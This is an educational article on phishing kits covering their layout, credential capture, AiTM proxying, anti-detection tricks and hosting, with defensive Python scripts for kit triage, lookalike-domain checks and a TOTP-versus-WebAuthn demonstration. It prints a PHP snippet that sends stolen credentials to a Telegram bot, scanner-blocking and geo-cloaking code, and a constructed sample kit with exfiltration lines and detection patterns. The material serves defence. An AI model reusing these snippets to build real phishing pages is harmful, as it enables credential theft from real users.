Phishing kits are ready-made packages that enable criminals with minimal technical skill to deploy convincing fake websites that steal credentials. They’re available on dark web forums for $20–200 and come with HTML/CSS clones of major login pages, back-end PHP for capturing credentials, obfuscation code to avoid detection, and sometimes real-time alerting. Understanding how phishing kits work helps defenders recognize them and users avoid them.
What a Phishing Kit Contains
A typical phishing kit is a ZIP archive containing:
phishing-kit/
├── index.php # Main redirect/landing page
├── login.html # Fake login page (cloned from target)
├── login.php # Credential capture script
├── redirect.php # Sends victim to real site after capture
├── .htaccess # Anti-detection rules
├── resources/
│ ├── style.css # Cloned CSS
│ ├── logo.png # Target's logo
│ └── images/ # Cloned assets
└── logs/
└── credentials.txt # Stolen credential storage
The attacker uploads this kit to a compromised or newly registered website, sends phishing emails directing victims to it, and watches credentials roll in.
How Credential Capture Works
The fake login page looks identical to the real one. When a victim enters their username and password:
- login.php captures the submitted credentials
- Credentials are written to a log file on the server
- Credentials are simultaneously emailed or Telegram-messaged to the attacker in real time
- The kit shows a “Login failed, please try again” message (or sets an error parameter) and redirects the victim to the legitimate site
- The victim tries again on the real site, logs in successfully, and assumes they simply mistyped the first time
Real-time Telegram notification is common in modern kits:
// From a real phishing kit (simplified). $bot_token and $chat_id are the
// attacker's Telegram bot credentials, set elsewhere in the kit.
$message = "New Credential!\nEmail: " . $_POST['email'] . "\nPassword: " . $_POST['password'] . "\nIP: " . $_SERVER['REMOTE_ADDR'];
$telegram_api = "https://api.telegram.org/bot{$bot_token}/sendMessage";
// Exfiltration is a single outbound GET to the Bot API; the response is ignored.
file_get_contents("$telegram_api?chat_id=$chat_id&text=" . urlencode($message));
Adversary-in-the-Middle (AiTM) Phishing Kits
Modern sophisticated kits have evolved beyond simple credential forms. AiTM (Adversary-in-the-Middle) kits proxy the real website through the phishing server:
- Victim connects to the phishing server (thinking it’s the real site)
- The phishing server proxies the real site — showing the victim’s actual account interface
- The victim completes login (including MFA code entry)
- The phishing server captures the authenticated session cookie the real site sets after login
- The attacker replays that cookie to access the account; the session is already post-MFA, so the second factor never has to be repeated
Evilginx2 and Modlishka are the best-known open-source AiTM frameworks, built for authorized penetration testing; criminal phishing-as-a-service operators have built equivalents. AiTM phishing defeats TOTP, SMS and push-based MFA because those factors are simply relayed through, or approved for, the proxied login. Only origin-bound authentication (FIDO2/WebAuthn, whether a hardware security key or a platform passkey) is phishing-resistant: the browser signs the assertion over the origin it is actually on and refuses an rpId that is not a suffix of that origin, so the proxy's domain cannot produce an assertion the real site will accept.
Anti-Detection Techniques in Phishing Kits
Sophisticated kits include multiple layers of detection evasion:
Blocking Security Researchers and Bots
# .htaccess: return 403 to known scanner user agents (note that "bot"
# already matches "googlebot"); IP-based blocking uses separate deny rules
RewriteEngine On
RewriteCond %{HTTP_USER_AGENT} "bot|crawler|spider|googlebot" [NC]
RewriteRule .* - [F,L]
Many kits maintain lists of security company IP ranges, Tor exit nodes, and VPN providers — blocking these prevents automated phishing page detection.
Cloaking via Geolocation
// Show the phishing page only to targets in specific countries.
// ip-api.com returns the full name in "country" ("United States") and the
// ISO code in "countryCode", so the comparison must use countryCode.
$ip = $_SERVER['REMOTE_ADDR'];
$location = json_decode(file_get_contents("http://ip-api.com/json/$ip"), true);
if (!$location || $location['countryCode'] !== 'US') {
    header("Location: https://google.com");
    exit();
}
This shows the real phishing content only to IPs in the targeted country and redirects everyone else, including security researchers and URL scanners outside that country, to an innocent page. A practical consequence for defenders: a suspect URL must be fetched from an in-country vantage point (and with a browser-like user agent) before a "benign" scan result means anything.
CAPTCHA and JavaScript Requirements
Some kits require JavaScript execution or CAPTCHA completion before showing the phishing page — blocking simple HTTP scanners.
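The kit layout, the capture/exfiltration flow and the anti-detection rules above are all things a defender can fingerprint once a kit is recovered from a compromised host. The following triage script is an added example (not code from the page or from any real kit): it builds a constructed kit archive in memory that mirrors the layout above, then scores it against indicator rules for credential capture, log files, Telegram/e-mail exfiltration, redirects, geo-cloaking and bot blocking, and pulls out the exfiltration details worth pivoting on. The rules, file names, bot token, chat id and mailbox are all made up for the example.

```python
"""Triage an extracted phishing kit for the artefacts described above."""
import io
import re
import zipfile
from collections import defaultdict

# Indicator rules: (name, filename regex, content regex). Constructed from the
# behaviours described above; a production rule set would be far larger.
INDICATORS = [
    ("credential-capture", r"\.php$",
     r"\$_POST\[['\"](pass(word)?|pwd|login|email|user(name)?)['\"]\]"),
    ("log-to-file", r"\.php$", r"(fopen|file_put_contents|fwrite)\s*\(.*\.txt"),
    ("telegram-exfil", r"\.php$", r"api\.telegram\.org/bot"),
    ("email-exfil", r"\.php$", r"\bmail\s*\("),
    ("header-redirect", r"\.php$", r"header\s*\(\s*['\"]Location:"),
    ("geo-cloaking", r"\.php$", r"ip-api\.com|countryCode|geoip"),
    ("bot-blocking", r"\.htaccess$", r"HTTP_USER_AGENT.*\b(bot|crawler|spider)\b"),
    ("ip-blocklist", r"\.htaccess$", r"^\s*deny from\s+\d+"),
]

# Exfiltration details worth pivoting on: (name, regex with one capture group).
EXFIL_PATTERNS = [
    ("telegram-bot-token", r"\b(\d{8,10}:[A-Za-z0-9_-]{30,})"),
    ("telegram-chat-id", r"chat_id\s*=\s*['\"]?(-?\d{5,})"),
    ("mail-recipient", r"\bmail\s*\(\s*['\"]([^'\"]+@[^'\"]+)['\"]"),
]


def _files(zip_bytes: bytes):
    """Yield (name, text) for every regular file in the archive."""
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        for info in zf.infolist():
            if not info.is_dir():
                yield info.filename, zf.read(info).decode("utf-8", errors="replace")


def scan_kit(zip_bytes: bytes) -> dict[str, list[str]]:
    """Return {indicator: [files that matched]} for every rule that fired."""
    hits: dict[str, list[str]] = defaultdict(list)
    for name, text in _files(zip_bytes):
        for rule, fn_re, body_re in INDICATORS:
            if re.search(fn_re, name, re.I) and re.search(body_re, text, re.I | re.M):
                hits[rule].append(name)
    return dict(hits)


def exfil_details(zip_bytes: bytes) -> dict[str, set[str]]:
    """Pull the attacker's Telegram bot token, chat id and drop mailbox."""
    found: dict[str, set[str]] = defaultdict(set)
    for _, text in _files(zip_bytes):
        for rule, pattern in EXFIL_PATTERNS:
            for m in re.finditer(pattern, text):
                found[rule].add(m.group(1))
    return dict(found)


# Constructed sample kit mirroring the layout above; every value is made up.
SAMPLE_KIT = {
    "kit/index.php": "<?php header('Location: login.html'); ?>",
    "kit/login.html": "<form method='post' action='login.php'>...</form>",
    "kit/login.php": (
        "<?php\n"
        "$bot_token = '123456789:AAHexample_example_example_example00';\n"
        "$chat_id = '987654321';\n"
        "$f = fopen('logs/credentials.txt', 'a');\n"
        "fwrite($f, $_POST['email'] . ':' . $_POST['password'] . \"\\n\");\n"
        "$msg = 'New Credential! ' . $_POST['email'];\n"
        "file_get_contents(\"https://api.telegram.org/bot$bot_token/sendMessage\"\n"
        "    . \"?chat_id=$chat_id&text=\" . urlencode($msg));\n"
        "mail('drop@example.invalid', 'rezult', $msg);\n"
        "header('Location: https://login.example.com/?error=1');\n"
    ),
    "kit/.htaccess": (
        "RewriteEngine On\n"
        "RewriteCond %{HTTP_USER_AGENT} \"bot|crawler|spider\" [NC]\n"
        "RewriteRule .* - [F,L]\n"
        "deny from 203.0.113.0/24\n"
    ),
    "kit/geo.php": (
        "<?php $loc = json_decode(file_get_contents('http://ip-api.com/json/'\n"
        "    . $_SERVER['REMOTE_ADDR']), true);\n"
        "if ($loc['countryCode'] !== 'US') { header('Location: https://example.com/'); exit; }\n"
    ),
    "kit/resources/style.css": "body { font-family: sans-serif }",
}


def build_sample_kit() -> bytes:
    """Write SAMPLE_KIT to an in-memory ZIP, as a kit would be recovered."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        for name, body in SAMPLE_KIT.items():
            zf.writestr(name, body)
    return buf.getvalue()


if __name__ == "__main__":
    kit = build_sample_kit()
    for rule, files in scan_kit(kit).items():
        print(f"{rule:20} {', '.join(files)}")
    print(exfil_details(kit))
```

The bot token and chat id are the most actionable output: they identify the attacker's collection channel across every site the same kit was deployed to, which is what takedown requests and clustering of campaigns key on.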
How Phishing Pages Are Hosted
Compromised Legitimate Sites
The most common hosting method is compromising a legitimate website (often running outdated WordPress) and uploading the kit to a subdirectory. The domain has a reputation history and may pass reputation-based filters.
Free Hosting Services
Attackers abuse free hosting platforms — GitHub Pages, Netlify, Firebase Hosting, Google Sites, Cloudflare Pages — for temporary hosting before takedown. These platforms’ domains have high reputation with security filters.
Bulletproof Hosting
Criminal-friendly hosting providers in jurisdictions that don’t cooperate with takedown requests.
Domain Squatting
Registering domains that closely resemble legitimate ones:
- paypa1.com (letter “l” replaced with “1”)
- microsoft-account-support.com
- secure-bankofamerica-login.com
- Punycode domains: xn--pple-43d.com (renders as “аpple.com”, with a Cyrillic “а”, in browsers that don’t apply mixed-script checks)
Real-World Phishing Kit Examples
W3LL Panel — a phishing-as-a-service platform documented publicly by Group-IB in 2023. Subscribers got an admin panel with ready-to-deploy Microsoft 365 phishing kits, including AiTM capability that captured post-MFA session tokens in real time. Group-IB counted more than 56,000 targeted Microsoft 365 accounts, of which at least 8,000 were compromised.
EvilProxy — a PhaaS (Phishing as a Service) platform providing reverse-proxy phishing pages for Google, Apple, Facebook, Microsoft, and other major services. Advertised on dark web forums starting in 2022 at $400/month.
Recognizing Phishing Pages
Defensive indicators to look for:
- URL doesn’t match the legitimate domain: check the full hostname, not just what’s visible. login.microsoftonline.com.malicious-site.xyz is not Microsoft; the registrable domain is malicious-site.xyz.
- No lock icon / not HTTPS: HTTPS doesn’t guarantee legitimacy (attackers get free Let’s Encrypt certificates), but plain HTTP on a login page is always suspicious.
- Unusual subdomain structure: signin.paypal.com is legitimate; paypal-signin.malicious.com is not.
- Page reached from an unexpected email: legitimate services don’t typically email you and immediately ask you to log in.
- Urgency language: “Your account will be suspended in 24 hours unless you verify”
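The domain-squatting patterns above and the URL indicators in this list reduce to a few mechanical checks: decode Punycode, fold homoglyphs and digit swaps to what a human reads, find the registrable domain, and compare against a list of protected brands. The script below is an added example (not code from the page) implementing those checks; the confusable table, the brand list and the two-label "registrable domain" rule are simplifying assumptions (real tooling uses Unicode's confusables.txt and the Public Suffix List). It also shows the rule a password manager applies before autofilling, which is why it refuses paypa1.com.

```python
"""Lookalike-domain checks for the squatting and URL patterns described above."""
import unicodedata

# Constructed, partial homoglyph table: letters from other scripts that render
# like Latin letters in many fonts (Unicode's confusables.txt is the full list).
CONFUSABLES = {
    "\u0430": "a", "\u0435": "e", "\u043e": "o", "\u0440": "p", "\u0441": "c",
    "\u0445": "x", "\u0443": "y", "\u0456": "i", "\u04cf": "l",   # Cyrillic
    "\u03bf": "o", "\u03b1": "a", "\u03bd": "v",                    # Greek
}
DIGIT_SWAPS = {"1": "l", "0": "o", "3": "e", "5": "s"}              # paypa1 -> paypal
PROTECTED = ["apple.com", "bankofamerica.com", "microsoft.com",
             "microsoftonline.com", "paypal.com"]                   # assumed brand list


def to_unicode(host: str) -> str:
    """Decode Punycode labels: 'xn--pple-43d.com' -> 'аpple.com' (Cyrillic а)."""
    out = []
    for label in host.lower().rstrip(".").split("."):
        if label.startswith("xn--"):
            label = label[4:].encode("ascii").decode("punycode")
        out.append(label)
    return ".".join(out)


def registrable(host: str) -> str:
    """Last two labels. Assumption: no multi-label public suffixes (co.uk)."""
    return ".".join(host.split(".")[-2:])


def skeleton(host: str) -> str:
    """What a human reads: homoglyphs and digit swaps folded to plain Latin.
    Only for matching against PROTECTED, never for display."""
    text = unicodedata.normalize("NFKC", to_unicode(host))
    return "".join(DIGIT_SWAPS.get(c, CONFUSABLES.get(c, c)) for c in text)


def mixed_script(host: str) -> bool:
    """True if any label mixes scripts, the heuristic browsers use when deciding
    whether to display the Unicode form or fall back to the xn-- form."""
    for label in to_unicode(host).split("."):
        scripts = set()
        for ch in label:
            script = unicodedata.name(ch, "").split(" ")[0]
            if script in ("LATIN", "CYRILLIC", "GREEK"):
                scripts.add(script)
        if len(scripts) > 1:
            return True
    return False


def assess(host: str) -> dict:
    """Classify a hostname against the protected brand list."""
    uni = to_unicode(host)
    reg = registrable(uni)
    skel_reg = registrable(skeleton(host))
    if reg in PROTECTED:
        verdict = "legitimate"
    elif skel_reg in PROTECTED:
        verdict = f"lookalike of {skel_reg}"
    else:
        verdict = "unknown"
        for brand in PROTECTED:           # brand name buried in a hostname
            name = brand.split(".")[0]    # the attacker actually controls
            if name in uni:
                verdict = f"brand '{name}' in hostname but registrable domain is {reg}"
                break
    return {"unicode": uni, "registrable": reg, "skeleton": skel_reg,
            "mixed_script": mixed_script(host), "verdict": verdict}


def autofill_allowed(saved_domain: str, host: str) -> bool:
    """A password manager's rule: fill only when the page's registrable domain
    matches the saved entry exactly, after Punycode decoding."""
    return registrable(to_unicode(host)) == saved_domain


if __name__ == "__main__":
    for h in ["signin.paypal.com", "paypa1.com", "xn--pple-43d.com",
              "microsoft-account-support.com", "secure-bankofamerica-login.com",
              "login.microsoftonline.com.malicious-site.xyz",
              "paypal-signin.malicious.com"]:
        print(f"{h:48} {assess(h)['verdict']}")
```

The "brand in hostname" branch is deliberately last: it is the noisiest check (any hostname containing "apple" fires), but it is exactly the pattern of microsoft-account-support.com and the long-subdomain trick, so it belongs in a triage tool with a human behind it.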
Defense Against Phishing
FIDO2/WebAuthn authentication (hardware security keys such as YubiKey or Google Titan, and platform passkeys) is the only common second factor that is phishing-resistant. TOTP and SMS codes are relayed through AiTM kits unchanged, and push notifications are approved by the victim for a login the proxy itself initiated. WebAuthn binds the assertion cryptographically to the origin the browser is on, and the browser refuses to use a credential for an rpId that is not a suffix of that origin, so a phishing site gets nothing the real site will accept.
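The AiTM flow in the section above and the claim here that WebAuthn resists it can be shown side by side, as an added example that is not code from the page or from Evilginx/Modlishka. It models both factors as the relying party sees them: a TOTP code (RFC 6238) verifies no matter where it was typed, so the proxy simply forwards it; a WebAuthn assertion is signed over clientDataJSON, which carries the origin the browser actually loaded, so an assertion produced on the proxy's origin fails the relying party's origin check, and a conforming browser would already have refused the real rpId on the proxy's domain. The hostnames are constructed, and an HMAC stands in for the credential's real ECDSA signature so the example runs with the standard library only (the verification order and the fields checked are the real ones).

```python
"""Why an AiTM proxy can relay TOTP but cannot relay a FIDO2/WebAuthn login."""
import base64
import hashlib
import hmac
import json
import struct

REAL_ORIGIN = "https://login.example.com"         # constructed legitimate site
PROXY_ORIGIN = "https://login.example-com.xyz"    # constructed AiTM host
RP_ID = "example.com"                             # WebAuthn relying-party id


def b64url(data: bytes) -> str:
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode()


# --- TOTP (RFC 6238): the code depends on the shared secret and the clock only ---
def totp(secret: bytes, unix_time: int, step: int = 30, digits: int = 6) -> str:
    counter = struct.pack(">Q", unix_time // step)
    mac = hmac.new(secret, counter, hashlib.sha1).digest()
    offset = mac[-1] & 0x0F
    value = struct.unpack(">I", mac[offset:offset + 4])[0] & 0x7FFFFFFF
    return f"{value % 10 ** digits:0{digits}d}"


def rp_verify_totp(secret: bytes, code: str, unix_time: int) -> bool:
    return hmac.compare_digest(code, totp(secret, unix_time))


def aitm_relay_totp(secret: bytes, unix_time: int) -> bool:
    """The victim types the code into the proxy page; the proxy forwards it to
    the real site unchanged. Nothing in the code records where it was typed."""
    typed_into_proxy = totp(secret, unix_time)    # from the victim's authenticator app
    return rp_verify_totp(secret, typed_into_proxy, unix_time)


# --- WebAuthn: the assertion covers the origin the browser actually saw ---
def authenticator_sign(cred_key: bytes, origin: str, challenge: bytes, rp_id: str) -> dict:
    """What the browser and authenticator return for navigator.credentials.get().
    HMAC stands in for the credential's ECDSA signature (assumption)."""
    client_data = json.dumps({"type": "webauthn.get", "challenge": b64url(challenge),
                              "origin": origin}).encode()
    # authenticatorData = rpIdHash (32) || flags (1, UP set) || signCount (4)
    auth_data = hashlib.sha256(rp_id.encode()).digest() + b"\x01" + (0).to_bytes(4, "big")
    signed = auth_data + hashlib.sha256(client_data).digest()
    sig = hmac.new(cred_key, signed, hashlib.sha256).digest()
    return {"clientDataJSON": client_data, "authenticatorData": auth_data, "signature": sig}


def rp_verify_webauthn(cred_key: bytes, assertion: dict, challenge: bytes,
                       expected_origin: str = REAL_ORIGIN, rp_id: str = RP_ID) -> tuple[bool, str]:
    """The relying party's checks, in the order the WebAuthn spec lists them."""
    cd = json.loads(assertion["clientDataJSON"])
    if cd.get("type") != "webauthn.get":
        return False, "type"
    if cd.get("challenge") != b64url(challenge):
        return False, "challenge"
    if cd.get("origin") != expected_origin:
        return False, f"origin {cd.get('origin')} != {expected_origin}"
    if assertion["authenticatorData"][:32] != hashlib.sha256(rp_id.encode()).digest():
        return False, "rpIdHash"
    signed = assertion["authenticatorData"] + hashlib.sha256(assertion["clientDataJSON"]).digest()
    if not hmac.compare_digest(hmac.new(cred_key, signed, hashlib.sha256).digest(),
                               assertion["signature"]):
        return False, "signature"
    return True, "ok"


def browser_allows_rp_id(origin: str, rp_id: str) -> bool:
    """Browsers only let a page use an rpId equal to, or a registrable suffix
    of, the page's own host (simplified here to a suffix match)."""
    host = origin.split("://", 1)[1].split("/", 1)[0]
    return host == rp_id or host.endswith("." + rp_id)


def aitm_relay_webauthn(cred_key: bytes, challenge: bytes) -> tuple[bool, tuple[bool, str]]:
    """The proxy forwards the real site's challenge, but the victim's browser is
    on PROXY_ORIGIN. The browser refuses the real rpId there; and even if an
    assertion were produced anyway, it carries the proxy origin and the real
    site rejects it. Returns (blocked_by_browser, relying_party_verdict)."""
    blocked = not browser_allows_rp_id(PROXY_ORIGIN, RP_ID)
    forged = authenticator_sign(cred_key, PROXY_ORIGIN, challenge, RP_ID)
    return blocked, rp_verify_webauthn(cred_key, forged, challenge)


if __name__ == "__main__":
    secret, key, challenge = b"12345678901234567890", b"credential-private-key", b"\x00" * 16
    print("TOTP relayed through proxy accepted:", aitm_relay_totp(secret, 1_111_111_109))
    print("WebAuthn direct:", rp_verify_webauthn(key, authenticator_sign(key, REAL_ORIGIN, challenge, RP_ID), challenge))
    print("WebAuthn via proxy:", aitm_relay_webauthn(key, challenge))
```

The TOTP secret used in the stand-alone run is the RFC 6238 test-vector secret, so the codes it produces can be checked against the RFC's table; the challenge and credential key are arbitrary constructed bytes.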
Password managers are a structural defense: they autofill only on the exact registered domain. A password manager will not fill your PayPal credentials on paypa1.com because the domain doesn’t match. This alone catches a large percentage of phishing attempts.
Email authentication on your domain (SPF, DKIM, and DMARC with an enforcing policy) stops attackers from sending mail that claims to come from your domain, which blunts business email compromise campaigns. It does nothing against lookalike domains the attacker registers, which is where the domain checks above still matter.
Understanding phishing kit mechanics helps security teams build better detection rules, train employees more effectively, and evaluate which defensive investments (hardware keys vs. TOTP vs. SMS) provide real protection versus theater.